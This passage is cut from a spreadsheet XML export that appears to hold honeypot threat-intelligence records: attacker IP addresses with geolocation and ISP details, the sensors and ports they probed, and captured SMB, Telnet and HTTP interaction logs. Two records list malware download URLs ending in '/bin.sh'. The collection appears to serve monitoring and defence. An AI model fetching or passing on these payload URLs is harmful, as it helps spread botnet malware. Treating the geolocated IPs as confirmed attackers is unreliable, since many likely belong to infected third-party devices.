  </si>
  <si>
    <t>39.7483</t>
  </si>
  <si>
    <t>-121.843</t>
  </si>
  <si>
    <t>S WIRELESS INC</t>
  </si>
  <si>
    <t>::ffff:4b93:ec56</t>
  </si>
  <si>
    <t>bfff1a37fa83bfce8edb455fb001b85d</t>
  </si>
  <si>
    <t>49.207.14.254</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_HTTP_H25&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_VNC_H3&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;80&amp;&amp;1080&amp;&amp;22&amp;&amp;5900&amp;&amp;443&amp;&amp;389&amp;&amp;445&amp;&amp;9100&amp;&amp;15979&amp;&amp;1433</t>
  </si>
  <si>
    <t>Hyderabad (Avenue 4)</t>
  </si>
  <si>
    <t>500013</t>
  </si>
  <si>
    <t>17.4135</t>
  </si>
  <si>
    <t>78.448</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,52249)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,52032)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,52900)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,49636)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,50179)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,57052)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,57782)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,58437)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,58879)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,63170)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,63621)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,62292)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,64276)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,52431)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,53282)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,56373)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:31cf:efe</t>
  </si>
  <si>
    <t>bf7e64d890645e819907ee59ca1ef79a</t>
  </si>
  <si>
    <t>202.46.68.113</t>
  </si>
  <si>
    <t>Kabupaten Sumedang</t>
  </si>
  <si>
    <t>Sumedang</t>
  </si>
  <si>
    <t>1626103</t>
  </si>
  <si>
    <t>-6.8586100000000005</t>
  </si>
  <si>
    <t>107.916</t>
  </si>
  <si>
    <t>PT. Indonesia Comnet Plus</t>
  </si>
  <si>
    <t>::ffff:ca2e:4471</t>
  </si>
  <si>
    <t>e395c4e4d2d3f6805e1d334d9b85e20b</t>
  </si>
  <si>
    <t>103.147.9.166</t>
  </si>
  <si>
    <t>Bandung Regency</t>
  </si>
  <si>
    <t>Cileunyi</t>
  </si>
  <si>
    <t>1646492</t>
  </si>
  <si>
    <t>-6.93889</t>
  </si>
  <si>
    <t>107.753</t>
  </si>
  <si>
    <t>55699</t>
  </si>
  <si>
    <t>STARNET-AS-ID</t>
  </si>
  <si>
    <t>PT. Cemerlang Multimedia</t>
  </si>
  <si>
    <t>PT Aksara Perdana Multimedia</t>
  </si>
  <si>
    <t>::ffff:6793:9a6</t>
  </si>
  <si>
    <t>49f6368c6942b2ec7bb11ac093236777</t>
  </si>
  <si>
    <t>103.175.169.212</t>
  </si>
  <si>
    <t>Medinipur East</t>
  </si>
  <si>
    <t>Tamlūk</t>
  </si>
  <si>
    <t>1255046</t>
  </si>
  <si>
    <t>22.3008</t>
  </si>
  <si>
    <t>87.9259</t>
  </si>
  <si>
    <t>Raiganj Cable TV PVT LTD</t>
  </si>
  <si>
    <t>RCTVPL</t>
  </si>
  <si>
    <t>::ffff:67af:a9d4</t>
  </si>
  <si>
    <t>b9e722a041c74b215d50b4432b274a23</t>
  </si>
  <si>
    <t>165.225.113.23</t>
  </si>
  <si>
    <t>ZSCALER-INC</t>
  </si>
  <si>
    <t>::ffff:a5e1:7117</t>
  </si>
  <si>
    <t>e839701d5617f7b7ae2e4514c292876c</t>
  </si>
  <si>
    <t>103.124.173.31</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;3306&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>Panipat</t>
  </si>
  <si>
    <t>Samālkha</t>
  </si>
  <si>
    <t>1257566</t>
  </si>
  <si>
    <t>132101</t>
  </si>
  <si>
    <t>29.2405</t>
  </si>
  <si>
    <t>77.0118</t>
  </si>
  <si>
    <t>138260</t>
  </si>
  <si>
    <t>Shirsty Internet Services Pvt Ltd</t>
  </si>
  <si>
    <t>Shirsty  Pvt Ltd</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.124.173.31,52027)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:677c:ad1f</t>
  </si>
  <si>
    <t>ef88bb144ce24352a2e0993b84b429fe</t>
  </si>
  <si>
    <t>176.8.138.227</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_MT-CPA_H43</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;161&amp;&amp;59731&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b008:8ae3</t>
  </si>
  <si>
    <t>4a018090b47fa8383184cfa68cb2938a</t>
  </si>
  <si>
    <t>154.204.177.22</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>3306&amp;&amp;31138&amp;&amp;NA</t>
  </si>
  <si>
    <t>400619</t>
  </si>
  <si>
    <t>AROSSCLOUD INC.</t>
  </si>
  <si>
    <t>Fastmos Co Limited</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:9acc:b116</t>
  </si>
  <si>
    <t>d0a06a2cd240d5aebdbd46f0f8497af6</t>
  </si>
  <si>
    <t>88.247.152.124</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>2005-10-27</t>
  </si>
  <si>
    <t>::ffff:58f7:987c</t>
  </si>
  <si>
    <t>f3ca8e313e8b3f3c6b20db98fcb5d977</t>
  </si>
  <si>
    <t>203.35.82.133</t>
  </si>
  <si>
    <t>bcano.tcif.telstra.com.au</t>
  </si>
  <si>
    <t>Telstra Corporation</t>
  </si>
  <si>
    <t>Telstra Corporation Limited</t>
  </si>
  <si>
    <t>2025-03-13 02:50:02</t>
  </si>
  <si>
    <t>['a1-185.akam.net', 'a11-66.akam.net', 'a18-64.akam.net', 'a2-65.akam.net', 'a28-66.akam.net', 'a3-65.akam.net', 'adns05.bigpond.com', 'adns06.bigpond.com']</t>
  </si>
  <si>
    <t>['clientDeleteProhibited https://identitydigital.au/get-au/whois-status-codes#clientDeleteProhibited', 'serverDeleteProhibited https://identitydigital.au/get-au/whois-status-codes#serverDeleteProhibited', 'serverTransferProhibited https://identitydigital.au/get-au/whois-status-codes#serverTransferProhibited', 'serverUpdateProhibited https://identitydigital.au/get-au/whois-status-codes#serverUpdateProhibited']</t>
  </si>
  <si>
    <t>::ffff:cb23:5285</t>
  </si>
  <si>
    <t>High&amp;&amp;Medium</t>
  </si>
  <si>
    <t>3dfa647c1e9f76196a5f7fe77dc7c1ca</t>
  </si>
  <si>
    <t>122.169.99.149</t>
  </si>
  <si>
    <t>Mumbai (Malad West)</t>
  </si>
  <si>
    <t>400064</t>
  </si>
  <si>
    <t>19.1841</t>
  </si>
  <si>
    <t>72.8357</t>
  </si>
  <si>
    <t>ABTS-MUMBAI</t>
  </si>
  <si>
    <t>::ffff:7aa9:6395</t>
  </si>
  <si>
    <t>88931cfd4c15fe1816944f6268b456ab</t>
  </si>
  <si>
    <t>115.97.3.154</t>
  </si>
  <si>
    <t>::ffff:7361:39a</t>
  </si>
  <si>
    <t>8073fced99c8ac357067440c024e5c99</t>
  </si>
  <si>
    <t>103.197.224.104</t>
  </si>
  <si>
    <t>Mumbai (Kamathipura)</t>
  </si>
  <si>
    <t>400008</t>
  </si>
  <si>
    <t>18.9623</t>
  </si>
  <si>
    <t>72.8226</t>
  </si>
  <si>
    <t>United Stars</t>
  </si>
  <si>
    <t>2015-10-09</t>
  </si>
  <si>
    <t>UNITED-IN</t>
  </si>
  <si>
    <t>::ffff:67c5:e068</t>
  </si>
  <si>
    <t>2ae583c6e41f4017870829c7ff4e87c1</t>
  </si>
  <si>
    <t>103.52.36.152</t>
  </si>
  <si>
    <t>Medchal</t>
  </si>
  <si>
    <t>1263226</t>
  </si>
  <si>
    <t>17.6297</t>
  </si>
  <si>
    <t>78.4814</t>
  </si>
  <si>
    <t>45582</t>
  </si>
  <si>
    <t>VAINAVI INDUSTIES LTD, INTERNET SERVICE PROVIDER, INDIA</t>
  </si>
  <si>
    <t>VAINAVIINDUSTRIESLTD</t>
  </si>
  <si>
    <t>Jesmi Online PVT LTD</t>
  </si>
  <si>
    <t>::ffff:6734:2498</t>
  </si>
  <si>
    <t>7c4a452de96bda7fd3951be66c8e45f3</t>
  </si>
  <si>
    <t>103.52.36.68</t>
  </si>
  <si>
    <t>2015-03-04</t>
  </si>
  <si>
    <t>SKYNETWORKS</t>
  </si>
  <si>
    <t>::ffff:6734:2444</t>
  </si>
  <si>
    <t>8b077788453e07294b749407f98b915f</t>
  </si>
  <si>
    <t>218.161.61.155</t>
  </si>
  <si>
    <t>218-161-61-155.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H26&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;23628&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:daa1:3d9b</t>
  </si>
  <si>
    <t>8cee41eb90a82772b8bedc3cfc521353</t>
  </si>
  <si>
    <t>178.151.174.243</t>
  </si>
  <si>
    <t>Kyiv (Obolons'kyi district)</t>
  </si>
  <si>
    <t>50.5208</t>
  </si>
  <si>
    <t>30.5216</t>
  </si>
  <si>
    <t>13188</t>
  </si>
  <si>
    <t>CONTENT DELIVERY NETWORK LTD</t>
  </si>
  <si>
    <t>Triolan</t>
  </si>
  <si>
    <t>2010-04-15</t>
  </si>
  <si>
    <t>::ffff:b297:aef3</t>
  </si>
  <si>
    <t>fa77bf8f9a83a5929deb49426c8d39ac</t>
  </si>
  <si>
    <t>117.235.64.141</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>45204&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75eb:408d</t>
  </si>
  <si>
    <t>779b598cf46648ff9abe3d75bb6528ea</t>
  </si>
  <si>
    <t>83.218.189.32</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>50991&amp;&amp;23</t>
  </si>
  <si>
    <t>AT</t>
  </si>
  <si>
    <t>Austria</t>
  </si>
  <si>
    <t>7</t>
  </si>
  <si>
    <t>Tyrol</t>
  </si>
  <si>
    <t>Innsbruck</t>
  </si>
  <si>
    <t>2775220</t>
  </si>
  <si>
    <t>47.2627</t>
  </si>
  <si>
    <t>11.3945</t>
  </si>
  <si>
    <t>31543</t>
  </si>
  <si>
    <t>myNet GmbH</t>
  </si>
  <si>
    <t>myNET Internet Solutions</t>
  </si>
  <si>
    <t>2004-03-17</t>
  </si>
  <si>
    <t>None&amp;&amp;login&amp;&amp;connection</t>
  </si>
  <si>
    <t>::ffff:53da:bd20</t>
  </si>
  <si>
    <t>99d206f757164c4a3b1e06f5582af617</t>
  </si>
  <si>
    <t>202.65.34.11</t>
  </si>
  <si>
    <t>SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_FTP_HC1</t>
  </si>
  <si>
    <t>-21.2075</t>
  </si>
  <si>
    <t>-159.775</t>
  </si>
  <si>
    <t>10131</t>
  </si>
  <si>
    <t>Telecom Cook Islands Ltd</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_FTP:NA}</t>
  </si>
  <si>
    <t>::ffff:ca41:220b</t>
  </si>
  <si>
    <t>5905b2d7a30076dc30ec743c8c01767d</t>
  </si>
  <si>
    <t>27.72.78.133</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;22&amp;&amp;47192&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:1b48:4e85</t>
  </si>
  <si>
    <t>c185df03f4b214c1d51dcf97015ad195</t>
  </si>
  <si>
    <t>81.215.208.119</t>
  </si>
  <si>
    <t>::ffff:51d7:d077</t>
  </si>
  <si>
    <t>33fa0d7cafef9da6a5a16d402cba1fa3</t>
  </si>
  <si>
    <t>59.99.129.3</t>
  </si>
  <si>
    <t>::ffff:3b63:8103</t>
  </si>
  <si>
    <t>0e3c933457108299b59bbf2440dfc455</t>
  </si>
  <si>
    <t>222.127.237.115</t>
  </si>
  <si>
    <t>http://222.127.237.115:52061/bin.sh</t>
  </si>
  <si>
    <t>Southern Manila District</t>
  </si>
  <si>
    <t>Taguig</t>
  </si>
  <si>
    <t>1684308</t>
  </si>
  <si>
    <t>1630</t>
  </si>
  <si>
    <t>14.5535</t>
  </si>
  <si>
    <t>121.05</t>
  </si>
  <si>
    <t>::ffff:de7f:ed73</t>
  </si>
  <si>
    <t>4c963b78c12edced5ba26c700ac372ce</t>
  </si>
  <si>
    <t>117.209.92.117</t>
  </si>
  <si>
    <t>http://117.209.92.117:52750/bin.sh</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;abuse.ch</t>
  </si>
  <si>
    <t>::ffff:75d1:5c75</t>
  </si>
  <si>
    <t>527d8b23f8d11c4450b799e6e2672683</t>
  </si>
  <si>
    <t>157.15.96.5</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>22&amp;&amp;38753&amp;&amp;1433&amp;&amp;445&amp;&amp;3306</t>
  </si>
  <si>
    <t>JA</t>
  </si>
  <si>
    <t>Jambi</t>
  </si>
  <si>
    <t>Tebo Regency</t>
  </si>
  <si>
    <t>Muara Tebo</t>
  </si>
  <si>
    <t>1634792</t>
  </si>
  <si>
    <t>-1.46356</t>
  </si>
  <si>
    <t>102.36</t>
  </si>
  <si>
    <t>152364</t>
  </si>
  <si>
    <t>Dinas Komunikasi dan Informatika Kabupaten Tebo</t>
  </si>
  <si>
    <t>Diskominfo Kab Tebo</t>
  </si>
  <si>
    <t>2024-01-31</t>
  </si>
  <si>
    <t>IDNIC-KABTEBO-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (157.15.96.5,50101)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (157.15.96.5,57841)}&amp;&amp;{Data_SMB:Incoming connection (157.15.96.5,58512)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (157.15.96.5,53453)}&amp;&amp;{Data_SMB:Incoming connection (157.15.96.5,54061)}</t>
  </si>
  <si>
    <t>::ffff:9d0f:6005</t>
  </si>
  <si>
    <t>1feda9d115645712e9cc7f3b7125d7dc</t>
  </si>
  <si>
    <t>103.26.109.81</t>
  </si>
  <si>
    <t>1263247</t>
  </si>
  <si>
    <t>11.1035</t>
  </si>
  <si>
    <t>79.655</t>
  </si>
  <si>
    <t>132774</t>
  </si>
  <si>
    <t>Niss Internet services private limited</t>
  </si>
  <si>
    <t>Niss Networks</t>
  </si>
  <si>
    <t>Niss network solution private limited</t>
  </si>
  <si>
    <t>2013-06-19</t>
  </si>
  <si>
    <t>SPACIOUSHOSTING</t>
  </si>
  <si>
    <t>::ffff:671a:6d51</t>
  </si>
  <si>
    <t>c91d0d42e498ad1e3e7c61a2c311a7ad</t>
  </si>
  <si>
    <t>116.98.249.4</t>
  </si>
  <si>
    <t>::ffff:7462:f904</t>
  </si>
  <si>
    <t>764383491b6e0ba68d3efc704fed2651</t>
  </si>
  <si>
    <t>110.34.75.119</t>
  </si>
  <si>
    <t>Seoul (Gyeongdongsijang-ro 12-gil)</t>
  </si>
  <si>
    <t>37.5822</t>
  </si>
  <si>
    <t>127.042</t>
  </si>
  <si>
    <t>9757</t>
  </si>
  <si>
    <t>CMB DONDAEMOON BROADCASTING</t>
  </si>
  <si>
    <t>CMB DONGSEO BROADCASTING</t>
  </si>
  <si>
    <t>::ffff:6e22:4b77</t>
  </si>
  <si>
    <t>a49a45ec97a2703d3f8ceff9f114cc5c</t>
  </si>
  <si>
    <t>78.189.141.70</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Bursa Province</t>
  </si>
  <si>
    <t>Osmangazi District</t>
  </si>
  <si>
    <t>Bursa</t>
  </si>
  <si>
    <t>750269</t>
  </si>
  <si>
    <t>40.1885</t>
  </si>
  <si>
    <t>29.061</t>
  </si>
  <si>
    <t>::ffff:4ebd:8d46</t>
  </si>
  <si>
    <t>dd18edb28a41aa09ebcf397d2c1a1e56</t>
  </si>
  <si>
    <t>185.209.196.144</t>
  </si>
  <si>
    <t>::ffff:b9d1:c490</t>
  </si>
  <si>
    <t>4340965a5b5cab3bb8482fbd20bdef51</t>
  </si>
  <si>
    <t>85.89.170.5</t>
  </si>
  <si>
    <t>NA&amp;&amp;staticline12544.toya.net.pl</t>
  </si>
  <si>
    <t>Łódź Voivodeship</t>
  </si>
  <si>
    <t>Lodz</t>
  </si>
  <si>
    <t>Lodz (Polesie)</t>
  </si>
  <si>
    <t>3093133</t>
  </si>
  <si>
    <t>90-050</t>
  </si>
  <si>
    <t>51.757</t>
  </si>
  <si>
    <t>19.4411</t>
  </si>
  <si>
    <t>16342</t>
  </si>
  <si>
    <t>Toya sp.z.o.o</t>
  </si>
  <si>
    <t>TOYA Sp. z o.o.</t>
  </si>
  <si>
    <t>Toya:net</t>
  </si>
  <si>
    <t>::ffff:5559:aa05</t>
  </si>
  <si>
    <t>a6eb6bd2addf08b9808ab7fbe3aaa8d2</t>
  </si>
  <si>
    <t>120.56.153.11</t>
  </si>
  <si>
    <t>::ffff:7838:990b</t>
  </si>
  <si>
    <t>2449b09293a4b074d18becd2e36fe9c8</t>
  </si>
  <si>
    <t>117.231.135.189</t>
  </si>
  <si>
    <t>::ffff:75e7:87bd</t>
  </si>
  <si>
    <t>dbbd5f54d96009949917dd067c97c112</t>
  </si>
  <si>
    <t>116.88.135.130</t>
  </si>
  <si>
    <t>1.29596</t>
  </si>
  <si>
    <t>SGCABLEVISION</t>
  </si>
  <si>
    <t>::ffff:7458:8782</t>
  </si>
  <si>
    <t>3f816d3b818cdebb215063fdf9843e3d</t>
  </si>
  <si>
    <t>117.207.242.179</t>
  </si>
  <si>
    <t>::ffff:75cf:f2b3</t>
  </si>
  <si>
    <t>a54f846af13ac2cfabe6b5618021c63b</t>
  </si>
  <si>
    <t>187.189.120.89</t>
  </si>
  <si>
    <t>fixed-187-189-120-89.totalplay.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>22884</t>
  </si>
  <si>
    <t>TOTAL PLAY TELECOMUNICACIONES SA DE CV</t>
  </si>
  <si>
    <t>Total Play Telecomunicaciones SA De CV</t>
  </si>
  <si>
    <t>::ffff:bbbd:7859</t>
  </si>
  <si>
    <t>41ad48fcdf54d0f680ba49396a3ff241</t>
  </si>
  <si>
    <t>117.221.123.240</t>
  </si>
  <si>
    <t>::ffff:75dd:7bf0</t>
  </si>
  <si>
    <t>49070812b758a3c8663f012e1d5f159f</t>
  </si>
  <si>
    <t>117.207.247.212</t>
  </si>
  <si>
    <t>::ffff:75cf:f7d4</t>
  </si>
  <si>
    <t>d028db8fd696f4688df7e334e42ae673</t>
  </si>
  <si>
    <t>117.221.158.93</t>
  </si>
  <si>
    <t>::ffff:75dd:9e5d</t>
  </si>
  <si>
    <t>87edfa00c573941edb75ce081c00dee5</t>
  </si>
  <si>
    <t>220.134.92.45</t>
  </si>
  <si>
    <t>220-134-92-45.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;6519&amp;&amp;60579&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:dc86:5c2d</t>
  </si>
  <si>
    <t>b15d34f01b169c504bc6e0af8cf2d373</t>
  </si>
  <si>
    <t>27.118.25.248</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H10</t>
  </si>
  <si>
    <t>55313</t>
  </si>
  <si>
    <t>Hanel Communication JSC</t>
  </si>
  <si>
    <t>HANELCOM</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,59971)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,60006)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,52002)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,52033)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,57628)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,57881)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,55172)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,55230)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,51129)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,51154)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE 